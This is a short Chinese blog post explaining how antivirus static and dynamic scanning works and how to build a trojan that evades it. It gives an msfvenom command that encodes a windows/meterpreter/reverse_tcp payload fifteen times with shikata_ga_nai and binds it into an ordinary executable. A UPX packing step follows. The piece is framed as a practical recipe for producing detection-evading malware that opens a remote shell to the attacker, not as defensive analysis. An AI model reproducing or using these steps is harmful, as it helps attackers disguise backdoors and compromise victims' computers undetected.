目录
木马的识别原理:
木马的扫描分为静态扫描和动态扫描,静态扫描是指杀软对木马与自己的病毒库进行比较判断是否为木马。动态扫描是对木马执行时的行为与病毒库的行为进行比较判断是否为木马。
免杀木马的制作过程:
首先我们要想绕过静态,最简单的方法就是直接用kali linux 中的msfvenom 进行编码多编几次就能过静态扫描了。我个人认为x86/shikata_ga_nai这个编码器挺好用的(但也得编码十几次)。最后在随便捆绑一个应用程序动静动能过。
msf的指令:msfvenom -p '合适的载荷' -x '捆绑程序名' -e x86/shikata_ga_nai -i '编码次数' lhost='kali ip' -f '合适的文件类型' -o '文件名'
例子:
msfvenom -p windows/meterpreter/reverse_tcp -x kunbangchengxu.exe -e x86/shikata_ga_nai -i 15 lhost= 192.168.1.2 -f exe -o muma.exe
运行之后生成木马。用upx加壳
upx muma.exe</
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
